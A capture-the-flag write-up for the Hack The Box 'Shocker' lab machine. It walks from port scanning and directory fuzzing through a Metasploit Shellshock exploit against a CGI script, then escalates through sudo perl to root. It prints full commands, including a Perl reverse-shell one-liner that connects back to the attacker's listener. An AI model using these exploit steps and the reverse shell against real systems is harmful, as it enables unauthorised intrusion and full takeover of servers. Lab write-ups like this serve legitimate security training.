👽Shocker Writeup

[Perl] [Injection] [Web]

Nmap

• -sC: Performs a script scan using the default set of scripts

• -sV: Probe open ports to determine service/version info

• -O: Enable OS detection

• -oA: Output in the three major formats at once

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ sudo nmap -sC -sV -O -oA nmap_shocker 10.10.10.56                                                                                                                   1 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-09 21:11 EST
Nmap scan report for 10.10.10.56
Host is up (0.014s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/9%OT=80%CT=1%CU=33684%PV=Y%DS=2%DC=I%G=Y%TM=61DB95F2
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54BST11NW6%O2=M54BST11NW6%O3=M54BNNT11NW6%O4=M54BST11NW6%O5=M54BST11
OS:NW6%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.49 secondsl

We are greeted by an image that looks like a very hostile bug when we visited the URL http://10.10.10.56/ on a web browser.

Gobuster

• dir: Uses directory/file enumeration mode

• -w: Path to the wordlist

• -u: The target URL

• -f: Append / to each request

• -x: File extension(s) to search for

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.56 -f -x php,html

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.56 -f -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/01/10 00:00:15 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 137]
/cgi-bin/             (Status: 403) [Size: 294]
/icons/               (Status: 403) [Size: 292]

Dirbuster

Fuzzing for the extension sh, py, pl using Dirbuster.

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ dirbuster                                                               
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1

Input the following fields into the Dirbuster's GUI:

• Target URL

• File with list of dirs/files

• File extension

Dir found: / - 200
Dir found: /cgi-bin/ - 403
Dir found: /icons/ - 403
File found: /cgi-bin/user.sh - 200

Dirbuster managed to find the following shell script:

File found: /cgi-bin/user.sh - 200

Google

https://httpd.apache.org/security/vulnerabilities_24.html appeared as one of the google search results using the search term 'Apache httpd 2.4.18 cgi-bin vulnerabilities'.

Msfconsole

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ msfconsole

Execute the following to search for a module:

• search apache cgi

msf6 > search apache cgi

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/multi/http/apache_normalize_path_rce         2021-05-10       excellent  Yes    Apache 2.4.49/2.4.50 Traversal RCE
   1  auxiliary/scanner/http/apache_normalize_path         2021-05-10       normal     No     Apache 2.4.49/2.4.50 Traversal RCE scanner
   2  exploit/linux/http/apache_druid_js_rce               2021-01-21       excellent  Yes    Apache Druid 0.20.0 Remote Command Execution
   3  exploit/windows/http/tomcat_cgi_cmdlineargs          2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   4  exploit/multi/http/apache_mod_cgi_bash_env_exec      2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   5  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   6  auxiliary/dos/http/apache_mod_isapi                  2010-03-05       normal     No     Apache mod_isapi Dangling Pointer
   7  exploit/windows/http/php_apache_request_headers_bof  2012-05-08       normal     No     PHP apache_request_headers Function Buffer Overflow
   8  exploit/multi/http/tomcat_jsp_upload_bypass          2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass


Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/tomcat_jsp_upload_bypass

The module 'apache_mod_cgi_bash_env_exec' will be used.

4  exploit/multi/http/apache_mod_cgi_bash_env_exec      2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

Execute the following commands:

• use 4

• show options

msf6 > use 4
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all a
                                              ddresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.249.135  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86

Set the require options and run the exploit:

• set LHOST 10.10.17.239

• set RHOST 10.10.10.56

• set TARGETURI /cgi-bin/user.sh

sf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.17.239
LHOST => 10.10.17.239
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 10.10.10.56
RHOST => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 10.10.17.239:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (984904 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.17.239:4444 -> 10.10.10.56:40956 ) at 2022-01-10 02:30:57 -0500

meterpreter > 

ip a

Execute 'ip a' to find the local host IP address which is needed for the option 'LHOST' for the Metasploit module.

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ ip a

3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.17.239/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:4::11ed/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::d863:fab4:a02d:5afd/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

The IP address for LHOST is 10.10.17.239.

inet 10.10.17.239/23 scope global tun0

Meterpreter

Execute 'shell' command to gain a shell session.

meterpreter > shell
Process 1467 created.
Channel 1 created.

Execute 'whoami'

whoami
shelly

We can use the find command to search for the .txt file that contains the flag for the user.

find /home -type f -name *.txt
/home/shelly/user.txt
cat /home/shelly/user.txt
2ec2****************************

Sudo

-l: list user's privileges or check a specific command

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

The user Shelly is able to run Perl as root.

(root) NOPASSWD: /usr/bin/perl

Netcat

Execute 'nc -lvnp 1234' to create a listener on another terminal.

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ nc -lvnp 1234
listening on [any] 1234 ...

Reverse Shell

We are able to get the Perl reverse shell code from https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Update $i to the local host IP address

• $i:'"10.10.17.239"

Execute the following code in the Meterpreter session.

sudo perl -e 'use Socket;$i="10.10.17.239";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Netcat

Head back to the the terminal where we executed the Netcat listener code.

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.17.239] from (UNKNOWN) [10.10.10.56] 41484
/bin/sh: 0: can't access tty; job control turned off
# 

Execute 'whoami'

# whoami
root

Let's find and cat the .txt file that contains the flag for root.

# find /root -type f -name *.txt
/root/root.txt
# cat /root/root.txt
52c2****************************